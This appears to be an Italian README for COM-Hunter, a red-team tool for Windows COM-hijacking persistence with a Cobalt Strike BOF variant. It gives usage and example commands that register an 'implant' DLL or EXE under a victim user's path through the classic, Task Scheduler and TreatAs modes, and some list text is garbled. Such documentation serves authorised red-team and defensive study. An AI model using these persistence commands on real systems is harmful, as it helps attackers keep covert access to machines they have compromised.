
Strumento di persistenza per hijacking COM di Windows con modalità search, classic, Task Scheduler e TreatAs. Disponibile come eseguibile .NET e BOF per Cobalt Strike per operazioni red team.
COM Hijacking VOODOO

COM-Hunter è uno strumento di persistenza tramite COM Hijacking.
Disponibile sia in versione .NET che in variante BOF, completamente compatibile con Cobalt Strike.
Il seguente elenco spiega le modalità disponibili:
LocalServer32, InprocServer32 e voci di registro sia in HKLM che in HKCU.LocalServer32 o InprocServer32.LocalServer32 o InprocServer32.LocalServer32 o InprocServer32.LocalServer32, InprocServer32 e relative voci di registro sia in che in .ℹ️ Questo strumento è stato selezionato e fa orgogliosamente parte del Cobalt Strike Community Kit.
Se trovi qualche bug, non esitare a segnalarli. Il tuo feedback è prezioso per migliorare la qualità di questo progetto!
Gli autori e i collaboratori di questo progetto non sono responsabili per qualsiasi uso illegale dello strumento. È destinato esclusivamente a scopi educativi. Gli utenti sono responsabili di garantire un uso legale.
Questo progetto è stato creato con ❤️ da @nickvourd && @S1ckB0y1337.
Un ringraziamento speciale al mio amico Marios Gyftos per il suo prezioso aiuto durante la fase di beta testing di questo strumento.
Ispirato dal corso RTO di @zeropointsecltd.
L'implementazione BOF è ispirata da Lefteris Panos e dal suo fantastico progetto, RegPersist.
I file base.c e bofdefs.h sono copie dirette del progetto CS-Situational-Awareness-BOF di TrustedSec.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Modalità disponibili:
search Modalità Ricerca
persist Modalità Persistenza Classica
tasksch Modalità Task Scheduler
treatas Modalità TreatAs
remove Modalità Rimozione
[+] Modalità Ricerca:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Cerca implementazioni DLL ed EXE in HKLM e HKCU
-i, --inprocserver32 Cerca implementazioni DLL in HKLM e HKCU
-l, --localserver32 Cerca implementazioni EXE in HKLM e HKCU
-m, --machine Cerca implementazioni DLL ed EXE in HKLM
-u, --user Cerca implementazioni DLL ed EXE in HKCU
[+] Modalità Persistenza Classica:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Imposta implementazione DLL
-l, --localserver32 Imposta implementazione EXE
[+] Modalità Task Scheduler:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Imposta implementazione DLL
-l, --localserver32 Imposta implementazione EXE
[+] Modalità TreatAs:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Imposta implementazione DLL
-l, --localserver32 Imposta implementazione EXE
[+] Modalità Rimozione:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Rimuovi implementazioni DLL ed EXE in HKLM e HKCU
-i, --inprocserver32 Rimuovi implementazioni DLL in HKLM e HKCU
-l, --localserver32 Rimuovi implementazioni EXE in HKLM e HKCU
-m, --machine Rimuovi implementazioni DLL ed EXE in HKLM
-u, --user Rimuovi implementazioni DLL ed EXE in HKCU
ℹ️ Cerca implementazioni DLL ed EXE in HKLM e HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Cerca implementazioni EXE in HKLM e HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Ricerca avanzata di implementazioni EXE in HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Cerca implementazioni EXE e DLL in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Esegui persistenza classica usando implementazione DLL:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Esegui persistenza classica usando implementazione EXE:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Esegui persistenza tramite Task Scheduler usando implementazione DLL:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Esegui persistenza tramite la chiave di registro TreatAs e un CLSID falso (inoltrabile) usando implementazione DLL:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Rimuovi persistenza dell'implementazione DLL in HKCU usando:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Richiede la toolchain MinGW-w64 (x86_64-w64-mingw32-gcc e i686-w64-mingw32-gcc)
ℹ️ Compila gli oggetti BOF per entrambe le architetture:
./make_all.sh
Questo creerà:
com_hunter_*.com_hunter_*.x64.o e com_hunter_*.x86.o.com_hunter_*/.ℹ️ Dopo aver compilato i moduli BOF, carica semplicemente com_hunter_bof.cna in Cobalt Strike.
ℹ️ Per pulire gli artefatti di build, vai in ogni directory src ed esegui:
make clean
HKLMHKCU